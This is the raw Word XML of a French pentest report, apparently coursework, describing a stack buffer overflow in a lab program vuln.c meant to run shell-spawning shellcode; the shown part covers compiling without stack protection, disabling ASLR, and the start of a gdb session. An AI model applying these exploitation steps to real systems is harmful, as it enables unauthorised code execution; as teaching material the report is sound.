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79A3" w14:textId="42A38D6B" w:rsidR="0013261C" w:rsidRPr="0006046C" w:rsidRDefault="00142964" w:rsidP="00142964">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0006046C">
        <w:t>Pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0006046C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0006046C">
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0006046C">
        <w:t xml:space="preserve"> Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17751DD0" w14:textId="0305632C" w:rsidR="00142964" w:rsidRPr="0006046C" w:rsidRDefault="00142964" w:rsidP="00142964"/>
    <w:p w14:paraId="00BA41B7" w14:textId="1CD3EDE0" w:rsidR="00142964" w:rsidRDefault="00D239C1" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D239C1">
        <w:t xml:space="preserve">Titre de la </w:t>
      </w:r>
      <w:r w:rsidR="00916E4B" w:rsidRPr="00D239C1">
        <w:t>vulnérabilité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AF5FDA" w14:textId="21FA209F" w:rsidR="006D07AA" w:rsidRPr="00577F07" w:rsidRDefault="0006046C" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00577F07">
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00577F07">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00577F07">
        <w:t>execution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00577F07">
        <w:t xml:space="preserve"> by buffer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00577F07">
        <w:t>overflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="622C9C78" w14:textId="008335CD" w:rsidR="00142964" w:rsidRPr="00D239C1" w:rsidRDefault="00D239C1" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D239C1">
        <w:t>Descr</w:t>
      </w:r>
      <w:r>
        <w:t>iption de la vulnérabilité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4333A3FA" w14:textId="71547A42" w:rsidR="00142964" w:rsidRDefault="00C84AF3" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous allons exploiter une vulnérabilité de buffer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>overflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour injecter un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B2854">
        <w:t>dans la mémoire du programme</w:t>
      </w:r>
      <w:r w:rsidR="00E03D3F">
        <w:t xml:space="preserve"> et l’exécuter</w:t>
      </w:r>
      <w:r w:rsidR="00CD715F">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0EF0FE" w14:textId="724522E3" w:rsidR="006D07AA" w:rsidRDefault="00251D0F" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Éléments affectés</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A64E3C" w14:textId="15E2B6CB" w:rsidR="006D07AA" w:rsidRPr="006D07AA" w:rsidRDefault="0028765B" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fichier </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D5CCE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>vuln.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de l’exercice </w:t>
      </w:r>
      <w:r w:rsidR="00770F13">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de la séance </w:t>
      </w:r>
      <w:r w:rsidR="00770F13">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005C2DC7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA3C9DC" w14:textId="6EC60085" w:rsidR="007D269C" w:rsidRPr="00D239C1" w:rsidRDefault="00802D00" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00281EC2">
        <w:t>réalables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD786DB" w14:textId="3788CDAF" w:rsidR="00142964" w:rsidRPr="00D239C1" w:rsidRDefault="003C6A9C" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le code source </w:t>
      </w:r>
      <w:r w:rsidR="00E1118D">
        <w:t xml:space="preserve">du programme </w:t>
      </w:r>
      <w:r w:rsidR="00CB451E" w:rsidRPr="00770F13">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>vuln.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> est donné</w:t>
      </w:r>
      <w:r w:rsidR="00E1118D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2CBF4A" w14:textId="2881AEDC" w:rsidR="00200F18" w:rsidRPr="00281EC2" w:rsidRDefault="00200F18" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00281EC2">
        <w:t>Mise en place</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3E256B" w14:textId="5C9CAE34" w:rsidR="00427B60" w:rsidRDefault="00427B60" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ce proof of concept </w:t>
      </w:r>
      <w:r w:rsidR="00A70609">
        <w:t xml:space="preserve">est </w:t>
      </w:r>
      <w:r w:rsidR="00803693">
        <w:t xml:space="preserve">conçu sur une machine virtuelle Kali Linux 32 bits. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121DFB67" w14:textId="54CE73D2" w:rsidR="00200F18" w:rsidRDefault="001913F0" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous compilons </w:t>
      </w:r>
      <w:r w:rsidR="004478F0">
        <w:t>le programme avec la commande</w:t>
      </w:r>
      <w:r w:rsidR="0084416B">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4D884B" w14:textId="77777777" w:rsidR="0084416B" w:rsidRDefault="0084416B" w:rsidP="00577F07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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084416B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084416B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -g -z </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084416B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>execstack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084416B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084416B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084416B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-stack-protector -o vuln </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084416B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vuln.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C5EE6DC" w14:textId="0C47D25A" w:rsidR="00770F13" w:rsidRDefault="00770F13" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00770F13">
        <w:t xml:space="preserve">La protection des stacks </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00770F13">
        <w:t>pro</w:t>
      </w:r>
      <w:r>
        <w:t>tectors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est désactivée</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301350EC" w14:textId="72C386F8" w:rsidR="00770F13" w:rsidRPr="00770F13" w:rsidRDefault="00770F13" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>La protection de l’exécution des instructions sur la stack est désactivée</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3F4339" w14:textId="5FF102F3" w:rsidR="0084416B" w:rsidRDefault="00B76593" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008435CA">
        <w:t>Nous désactivons la</w:t>
      </w:r>
      <w:r w:rsidR="008435CA" w:rsidRPr="008435CA">
        <w:t xml:space="preserve"> protection de sécurité </w:t>
      </w:r>
      <w:r w:rsidR="008435CA">
        <w:t xml:space="preserve">ASLR avec </w:t>
      </w:r>
      <w:r w:rsidR="00841C7E">
        <w:t>la commande :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F39AD3" w14:textId="0DDFCF3C" w:rsidR="00841C7E" w:rsidRDefault="00841C7E" w:rsidP="00577F07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841C7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 0 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00841C7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00841C7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tee </w:t>
      </w:r>
      <w:r w:rsidR="003F35DC" w:rsidRPr="003F35DC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/proc/sys/kernel/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F35DC" w:rsidRPr="003F35DC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>randomize_va_space</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="54A6D8A2" w14:textId="77777777" w:rsidR="002974AD" w:rsidRPr="002974AD" w:rsidRDefault="002974AD" w:rsidP="002974AD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2761E723" w14:textId="118CC400" w:rsidR="0084416B" w:rsidRPr="00577F07" w:rsidRDefault="001C4E10" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00577F07">
        <w:t xml:space="preserve">Pour </w:t>
      </w:r>
      <w:r w:rsidR="00016C89" w:rsidRPr="00577F07">
        <w:t xml:space="preserve">faciliter </w:t>
      </w:r>
      <w:r w:rsidR="00D84809" w:rsidRPr="00577F07">
        <w:t xml:space="preserve">notre </w:t>
      </w:r>
      <w:r w:rsidR="00372115" w:rsidRPr="00577F07">
        <w:t>attaque, nous utilisons un script python hack.py</w:t>
      </w:r>
      <w:r w:rsidR="0077160C" w:rsidRPr="00577F07">
        <w:t xml:space="preserve"> fournit par ailleurs </w:t>
      </w:r>
      <w:r w:rsidR="00372115" w:rsidRPr="00577F07">
        <w:t xml:space="preserve">permettant de générer notre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00372115" w:rsidRPr="00577F07">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00372115" w:rsidRPr="00577F07">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00CB451E">
        <w:t xml:space="preserve">Au sein de ce script, nous utilisons un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CB451E">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB451E">
        <w:t xml:space="preserve"> connu permettant de lancer un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CB451E">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB451E">
        <w:t xml:space="preserve"> à son exécution.</w:t>
      </w:r>
      <w:r w:rsidR="00A17DFB">
        <w:t xml:space="preserve"> Ce script nécessite deux </w:t>
      </w:r>
      <w:r w:rsidR="00244A63">
        <w:t>paramètres</w:t>
      </w:r>
      <w:r w:rsidR="00A17DFB">
        <w:t xml:space="preserve"> pour fonctionner, </w:t>
      </w:r>
      <w:r w:rsidR="00F45D1A">
        <w:t xml:space="preserve">le nombre de bytes à écrire et l’adresse </w:t>
      </w:r>
      <w:r w:rsidR="001E40E7">
        <w:t>de l’instruction</w:t>
      </w:r>
      <w:r w:rsidR="00F45D1A">
        <w:t xml:space="preserve"> à exécuter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EFAE1A" w14:textId="24DCEAE9" w:rsidR="00142964" w:rsidRPr="00D239C1" w:rsidRDefault="00142964" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D239C1">
        <w:t>Proof of concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F19C2F2" w14:textId="5227FBDC" w:rsidR="00A17DFB" w:rsidRDefault="00A17DFB" w:rsidP="00A17DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous commençons par </w:t>
      </w:r>
      <w:r w:rsidR="00F45D1A">
        <w:t xml:space="preserve">rechercher </w:t>
      </w:r>
      <w:r w:rsidR="00F37046">
        <w:t>le premier paramètre d</w:t>
      </w:r>
      <w:r w:rsidR="00E82D72">
        <w:t>u script hack.py</w:t>
      </w:r>
      <w:r w:rsidR="00BC4588">
        <w:t>, le nombre de bytes à écrire. Il s’agit du nombre de bytes sur la stack, entre le début du buffer où sera copié l’argument du programme</w:t>
      </w:r>
      <w:r w:rsidR="00447AAA">
        <w:t xml:space="preserve"> et la return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00447AAA">
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00447AAA">
        <w:t xml:space="preserve"> au sein de la </w:t>
      </w:r>
      <w:r w:rsidR="005D0F01">
        <w:t xml:space="preserve">stack frame de la fonction </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005D0F01">
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005D0F01">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C872CB" w14:textId="77777777" w:rsidR="00885E25" w:rsidRDefault="00885E25" w:rsidP="00885E25">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC226D0" w14:textId="0A360F85" w:rsidR="005629EA" w:rsidRDefault="005D0F01" w:rsidP="00885E25">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous lançons le programme </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dans gdb, et nous faisons une première exécution </w:t>
      </w:r>
      <w:r w:rsidR="00627BBE">
        <w:t>avec un argument quelconque afin que gdb puisse initialiser ses adresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7E5E3D" w14:textId="77777777" w:rsidR="00885E25" w:rsidRDefault="00885E25" w:rsidP="00885E25">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474FEAAE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840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>┌──(kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kali)-[~/Downloads]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEAFE8F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840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">└─$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00943CF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">gdb </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00943CF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00943CF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55349CA0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 xml:space="preserve">GNU </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Debian 12.1-3) 12.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E697672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>Copyright (C) 2022 Free Software Foundation, Inc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF1E8D4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>License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717DD8B1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>This is free software: you are free to change and redistribute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EEE9AD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>There is NO WARRANTY, to the extent permitted by law.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87508F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lastRenderedPageBreak/>
        <w:t>Type "show copying" and "show warranty" for details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052A7F6E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>This GDB was configured as "x86_64-linux-gnu".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A674DA4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>Type "show configuration" for configuration details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781A6CA2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>For bug reporting instructions, please see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C67DD0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>&lt;https://www.gnu.org/software/gdb/bugs/&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D54AE2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>Find the GDB manual and other documentation resources online at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA6B464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 xml:space="preserve">    &lt;http://www.gnu.org/software/gdb/documentation/&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C633691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</w:p>
    <w:p w14:paraId="35315B80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>For help, type "help".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41901D09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>Type "apropos word" to search for commands related to "word"...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B6AC73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>Reading symbols from vuln...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B028AE0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>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00943CF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run AAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9677B5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>Starting program: /home/kali/Downloads/vuln AAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567B4DC5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 xml:space="preserve">[Thread debugging using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabled]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53635183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 xml:space="preserve">Using host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> library "/lib/x86_64-linux-gnu/libthread_db.so.1".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243AEB5A" w14:textId="77777777" w:rsidR="00F327CE" w:rsidRPr="00840174" w:rsidRDefault="00F327CE" w:rsidP="00F327C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>AAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C1C962" w14:textId="5F40AEB8" w:rsidR="00885E25" w:rsidRPr="00840174" w:rsidRDefault="00F327CE" w:rsidP="00885E25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>[Inferior 1 (process 7824) exited normally]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766424D6" w14:textId="77777777" w:rsidR="00885E25" w:rsidRPr="00D27BF0" w:rsidRDefault="00885E25" w:rsidP="00885E25">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00CBA0F0" w14:textId="234F4F8F" w:rsidR="00662775" w:rsidRPr="00827127" w:rsidRDefault="00885E25" w:rsidP="00662775">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous mettons ensuite un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>breakpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> au début de la fonction </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, et nous exécutons </w:t>
      </w:r>
      <w:r w:rsidRPr="00840174">
        <w:t>de nouveau le programme avec un argument quelconque pour se retrouver dans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> l’exécution</w:t>
      </w:r>
      <w:r w:rsidR="00943CF9">
        <w:t xml:space="preserve"> du programme</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> au niveau de ce </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>breakpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00827127">
        <w:t xml:space="preserve"> Nous utilisons alors </w:t>
      </w:r>
      <w:r w:rsidR="00827127">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>info frame</w:t>
      </w:r>
      <w:r w:rsidR="00827127">
        <w:t xml:space="preserve"> pour retrouver </w:t>
      </w:r>
      <w:r w:rsidR="00662775">
        <w:t xml:space="preserve">la return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00662775">
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00662775">
        <w:t xml:space="preserve"> qui se trouve actuellement sur la stack frame et que nous </w:t>
      </w:r>
      <w:r w:rsidR="00943CF9">
        <w:t>souhaitons</w:t>
      </w:r>
      <w:r w:rsidR="00662775">
        <w:t xml:space="preserve"> remplacer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC672C2" w14:textId="77777777" w:rsidR="00885E25" w:rsidRDefault="00885E25" w:rsidP="00885E25">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F3CF2D" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00943CF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b vuln</w:t>
      </w:r>
    </w:p>
